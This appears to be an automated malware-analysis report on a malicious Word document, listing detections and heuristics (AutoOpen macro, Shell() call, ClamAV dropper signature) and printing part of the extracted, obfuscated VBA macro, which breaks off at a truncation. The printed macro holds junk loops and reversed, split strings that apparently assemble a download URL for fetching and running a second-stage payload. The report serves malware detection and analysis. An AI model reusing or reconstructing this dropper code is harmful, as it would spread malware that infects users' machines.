MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a legacy WordBasic Autoopen macro. This macro utilizes a Shell() call, indicating an intent to execute external commands, likely for downloading and running a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6529701-0' further supports its dropper functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6529701-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6529701-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 148428 bytes |
SHA-256: 26a97d07df0f650f98e4dc5418ac9db5129da4ba586163fd9b3cc5a88b6a83fd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zTYJnQbdkSvi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BOGzBc(YJIoP)
IOakuA = Chr(17913)
For YFqUW = 63075 To 97827
iWrrnc = 42867 / 23190 / cWBNnp * 81497 - 78778 - Tan(1 / Rnd(tmFFr))
Next
End Sub
Sub QQcIQc(vJkamw)
vjsOl = Chr(35212)
For IKkQzf = 632 To 76125
jdiwb = 43829 / 99276 / vWzar * 55281 - 26176 - Tan(1 / Rnd(uQZMu))
Next
TZRIFr = Chr(86045)
For wfIzB = 93076 To 14343
zZjiSP = 40707 / 6685 / hXNFP * 50658 - 51167 - Tan(1 / Rnd(sKFfS))
Next
HUfZS = Chr(35644)
For bRvuTA = 62248 To 30139
DENrY = 39721 / 60275 / hEhfI * 72995 - 3466 - Tan(1 / Rnd(iIYKn))
Next
End Sub
Sub DkWGFS(wZuCU)
BRbsn = Chr(79369)
For sNkOT = 60104 To 87563
osHFk = 27751 / 1882 / VRONzk * 60065 - 75635 - Tan(1 / Rnd(nfADDP))
Next
UTwpzH = Chr(74981)
For YmHhmw = 69686 To 84680
oGaYb = 41132 / 15275 / zlfztV * 70850 - 55315 - Tan(1 / Rnd(kRRLc))
Next
End Sub
Sub Autoopen()
On Error Resume Next
iooMc = Chr(96334)
For jDnzP = 95231 To 78742
szoHC = 41994 / 14746 / fRXEQM * 36490 - 50866 - Tan(1 / Rnd(LsvknJ))
Next
tQDiituvjGDhc (jwFbMt + zpFkHWzkcEN + nnIrT)
DarXNJ = Chr(90257)
For tkTkN = 19642 To 7993
tcFoJ = 46276 / 10367 / fOlLj * 31850 - 14975 - Tan(1 / Rnd(zzmkB))
Next
End Sub
Sub XdOZq(lrzjB)
ujmiSf = Chr(40770)
For rwXjVd = 54336 To 99805
PXTDUF = 53347 / 51138 / hsioPC * 19287 - 2653 - Tan(1 / Rnd(bhUiH))
Next
ZjYGi = Chr(6991)
For kmFkL = 65825 To 58937
aKEiz = 55242 / 95251 / jVZUH * 1150 - 35075 - Tan(1 / Rnd(kQDin))
Next
VvjUHs = Chr(67157)
For qbWwBW = 31698 To 92685
mbipk = 10685 / 67613 / kTpzv * 58497 - 718 - Tan(1 / Rnd(tpICcU))
Next
End Sub
Sub TDizz(zvzoG)
CJrkq = Chr(95164)
For XYtfv = 94964 To 43004
HhIui = 34498 / 43281 / lGIlu * 70156 - 47132 - Tan(1 / Rnd(LpNwcC))
Next
End Sub
Attribute VB_Name = "SENzhaY"
Sub AbAsNr(YzfwFi)
MUnzEU = Chr(12773)
For YhEdpp = 39975 To 39955
kNXHKu = 84592 / 21526 / RQOSdz * 49532 - 69397 - Tan(1 / Rnd(tJhWDc))
Next
End Sub
Function zpFkHWzkcEN()
On Error Resume Next
SmmWf = Chr(3491)
For sAWXR = 32030 To 50206
DzkEHR = 15113 / 66060 / aDsTkC * 35426 - 70983 - Tan(1 / Rnd(qvDtJw))
Next
wYHkKlt = ACXrLz("HRjQ'+'5'+'fds//'+':ptth '+'lw'+'B'+' = XCDA'+'L1'+'N'+';'+')33'+'1282 ,00'+'0'+'0DMi", 46856 - 46856 + 4 + 46856 - 46856, 46856 - 46856 + 78 + 46856 - 46856)
ANjYwN = Chr(56068)
For wBOEM = 59818 To 4573
EAvbI = 90410 / 16045 / Empaii * 18752 - 79033 - Tan(1 / Rnd(RGDYJp))
Next
QwmbwD = Chr(15160)
For AAFjs = 59181 To 7315
iuumT = 94716 / 91674 / ivtuTS * 16986 - 20047 - Tan(1 / Rnd(JGkSPQ))
Next
BSmtjbOEs = ACXrLz("hp.c[((eCAlpER.)'}}{hcta'+'c};'+'kaerb;)CDSL1'+'N'+'()izb,", 25848 - 25848 + 5 + 25848 - 25848, 25848 - 25848 + 51 + 25848 - 25848)
UBozwB = Chr(74354)
For oNwikJ = 23325 To 36872
LsDJM = 6046 / 64636 / vwjYTB * 36649 - 58426 - Tan(1 / Rnd(RRIwc))
Next
niiShl = Chr(32953)
For mMhcJJ = 19542 To 66361
UWDTvc = 75666 / 65552 / DXiws * 18380 - 32389 - Tan(1 / Rnd(FqtmE))
Next
TVOQwqin = ACXrLz("fM0nray'+'.8'+'poop=l?p'+'hp'+'.'+'vtset'+'/'+'KRAN/'+'mo'+'c'+'.r'+'ew'+'4r'+'e'+'woXscl", 64105 - 64105 + 6 + 64105 - 64105, 64105 - 64105 + 81 + 64105 - 64105)
cKjjBb = Chr(38036)
For NidHi = 97518 To 54893
Gvkait = 99152 / 77225 / XLDDT * 78777 - 5078 - Tan(1 / Rnd(XaILv))
Next
aGzhVR = Chr(52414)
For mPqSj = 47334 To 78941
zQJIC = 52382 / 88687 / qimEVU * 63090 - 64410 - Tan(1 / Rnd(QTnZM))
Next
YjGPjBMXFb = ACXrLz("%,XbEw)'xbma", 72373 - 72373 + 4 + 72373 - 72373, 72373 - 72373 + 3 + 72373 - 72373)
OwmmcW = Chr(64387)
For EpRXaU = 3022 To 92224
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.